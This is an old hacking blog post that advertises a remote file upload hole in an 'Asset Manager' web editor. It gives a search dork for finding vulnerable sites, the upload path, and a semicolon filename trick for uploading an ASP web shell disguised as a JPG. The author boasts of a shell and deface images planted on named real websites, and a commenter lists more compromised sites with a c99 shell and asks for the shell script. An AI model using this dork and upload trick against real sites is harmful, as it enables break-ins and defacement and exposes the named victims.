Friday, November 5, 2010

Asset Manager Remote File upload Vulnerability


Asset Manager Remote File upload Vulnerability

Vunlerability :Remote File upload


Risk  :High

Dork :inurl:Editor/assetmanager/assetmanager.asp


Exploit:

http://[PATH]/assetmanager/assetmanager.asp


and upload your shell .... dz4all.asp;.jpg

Thanks to Dz4all



I am not uploading any shell im just uploaded the image. If u wnt to learn how to upload the shell try it yourself
here is one example of shell uploaded by me
website
http://shootright.co.uk/

Shell link:-

http://shootright.co.uk/images/870.asp;me.jpg

 

 

Image uploaded Links  

http://www.aiu.edu/


image
http://www.aiu.edu/assets/public/a/avhack.JPG



http://www.licityguide.com/
image
http://www.licityguide.com/Editor/assets/avhack.jpg




1 comment:

  1. Hi Avi Check this out,
    don't publish this comment, just check those sites.


    http://www.aiu.edu/assets/public/hacked%20by%20av/home.jpg

    http://www.licityguide.com//Editor/assets/logo.jpg

    http://www.licityguide.com/Editor/assets/qqq/c99.php.jpg

    http://www.inntrondelagbrannvesen.no/dokumenter/maquina.png

    http://bamasociados.com/

    i want c99.php shell script if you have one.
    Thanks

    ReplyDelete